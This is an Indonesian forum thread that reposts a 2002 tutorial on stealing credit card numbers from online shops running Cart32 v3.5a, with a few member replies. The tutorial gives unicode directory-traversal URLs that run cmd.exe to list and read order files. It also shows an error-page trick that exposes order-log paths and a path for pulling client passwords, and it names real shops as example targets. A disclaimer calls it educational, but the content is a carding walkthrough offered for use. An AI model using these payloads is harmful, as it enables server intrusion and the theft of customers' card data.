Pencurian Kartu Kredit

[M Iqbal Mukmin S]

=============================================================================
TULISAN INI DIBUAT SEMATA-MATA HANYA UNTUK KEBUTUHAN PEMBELAJARAN
SEGALA EFEK YANG DITIMBULKAN AKIBAT TULISAN INI BUKAN TANGGUNG JAWAB PENULIS!
=============================================================================


Peringatan :
Segala informasi yang dimuat di artikel ini hanyalah untuk digunakan sebagai bahan referensi untuk tujuan pengetahuan saja. Informasi bukanlah kejahatan. Mengetahui cara berbuat sesuatu *BUKANLAH* kejahatan. Gunakan informasi ini untuk melindungi diri kamu sendiri.

Pencurian Credit Card Pada Web Site Cart32
Date: Wednesday, May 29, 2002 Hits: 16306 By: JoeGoeL

Pencurian nomor kartu kredit di internet telah menjadi makanan sehari-hari komunitas hacker baik di indonesia maupun di dunia. Salah satu cara yang paling banyak di pakai adalah melalui kelemahan dari web site yang menyediakan pembayaran online dengan credit card. Salah satu program yang sering dipakai oleh web site yang memberikan layanan pembayaran online ini adalah Cart32 yang paling banyak pula di bobol oleh hacker untuk mendapatkan kartu kredit.

TUTORIAL I : Cart32 v3.5a

NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan yang sama.

Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a
Langkah 2: Masuk ke website Cart32.exe
http://target/login/unicode/cart32.exe
(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)
Langkah 3: Setelah kamu masuk kesana, akan diperlihatkan tampilan seperti dibawah ini :

========================================
Cart32 v3.5a Shopping Cart System for Windows
http://www.cart32.com/
Registered to Greymane Connections
License: Unlimited clients
©1996-2001 McMurtrey/Whitaker & Associates, Inc.
Build 714
========================================

Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi berikut di
akhir URL, 98% memakai #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)
c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\) HANYA DIGUNAKAN KADANG2!

(contoh : http://www.connectionsmall.com/scripts /.%e0%80%af.. /..%e0%80%af.. /..%e0%80%af.. /winnt/system32/cmd.exe?/c+dir+c:\)

Langkah 5: Saat kamu berada di direktori utama (c:\), untuk masuk ke cc's, masukan kembali (\progra~1\MWAInc\Cart32\) ke akhir URL tadi sehingga sekarang kamu dapat melihat seperti : http://www.connectionsmall.com /scripts /.%e0%80%af.. /..%e0%80%af.. /..%e0%80%af../ winnt/system32/cmd.exe?/c+ dir+c:\progra~1\ mwainc\cart32\
Sekarang kamu dapat melihat banyak file seperti :

2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32

Langkah 6: Copy salah satu dari nama file tersebut dan kemudian masukkan ke akhir URL, dan akan terlihat seperti :

http://www.connectionsmall.com/ scripts /.%e0%80%af../..%e0%80%af.. /..%e0%80%af../ winnt/system32 /cmd.exe?/c+type+ c:\progra~1\ mwainc\cart32\ 2814659000-001003.c32

Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali cc's seperti :

RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)
procure-orders.txt (file ini tidak berada pada situs yang khusus ini)

Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti
*c+dir+c:\* ke *c+type+c:\*


TUTORIAL II : Cart32 v3.5a

Target: http://www.partybows.com
1. Ke http://www.partybows.com
2. Klik http://www.partybows.com/seasonal.htm
3. Isi Quantity= 1
Pokoknya kayak lu pura2x beli dan klik order
4. Maka akan kesini jadinya :
https://secure.axionet.com/partybows/cgi...ws-AddItem
5. Ubah menjadi
https://secure.axionet.com/partybows/cgi....exe/error
Cart32 v3.5 Error
CART32 Build 619
The following internal error has occurred: Invalid procedure Error Number = 5
Click Here For Possible Solutions
etc.
6. Cari log order-nya
Cart32 Setup Info and Directory
Mail Server = mail.axion.net
Section=Main
AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\
Jadi partybows-orders.txt
7. Sehingga akhirnya : http://www.partybows.com/cgi-bin/cart32/...orders.txt



TUTORIAL III : Cart32 v3.5a

search +/scripts/cart32.exe/
Exploitable Directories
-/scripts/cart32.exe/
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword
-/scripts/c32web.exe/
-/cgi-shl/c32web.exe/

Wherever there is the cart32.exe add this to the end of it /cart32clientlist and erase the rest a menu will come up with a submit box click go it will list ALL clients and their passwords passwords will be encrypted after decrypting the password, go to wherever the c32web.exe file is thats the instructions with exploits what that channel we were just in called!


Bye.. .




:: JoeGoeL ::.

Tutorial Hacking Cart32 v3.5a - Exploit
Author JoeGoeL aka Pred4t0r
Published JasaKom (English Version)
Dedicated Hiddenline & Medanhacking Crew :
#hiddenline - #medanhacking - on DALNET
Contact JoeGoeL@linuxmail.org
WebSite http://private.localbox.net (staff only - no link) :
http://published.localbox.net (free exploits - k00lz :
http://restriction.localbox.net (staff only - no link) :
Greetz r3v0lt,phayzer, the-p0, hellGoD, zeal0th,c4rnifor,etc! :
Creditz GDS, Hantu_BJM, ChriztianZ, BlackApriL, Phardera, Kebam, etc

[bukan pendaki]

wah jadi binun ....

[M Iqbal Mukmin S]

Binun melulu akh.........
Exsplor Dong coy..............

[bukan pendaki]

Gaya lo Min....
Emang ga ngerti mo diapain(dulu gak belajar seh)

[tommylaper]

explore apa sih om...

katanya udah murah ya...

ane mah make simpati aja deh...

[bukan pendaki]

Ga tau, biarin aja deh...Bang Mukmin gi Bergaya...

[Ademin]

Eit... Carding nih..

Warning yak TS, Tutz nya Extreme Black Hat !

Mohon jgn di lanjutkan yak

[nob1t4]

wakakak..

cara itu dah gak bs Min

dah lama bgt lobangNya pd ditutupin

klo tutorialnya sih blum basi
namanya jg Ilmu

Keep Share

[tommylaper]

mending diem aja deh...

dari pada sok tau...

jadi inget cerita anak muda sama orang tua

di thread comitment organisasi...

[M Iqbal Mukmin S]

Segala informasi yang dimuat di artikel ini hanyalah untuk digunakan sebagai bahan referensi untuk tujuan pengetahuan saja. Informasi bukanlah kejahatan. Mengetahui cara berbuat sesuatu *BUKANLAH* kejahatan.

OK ..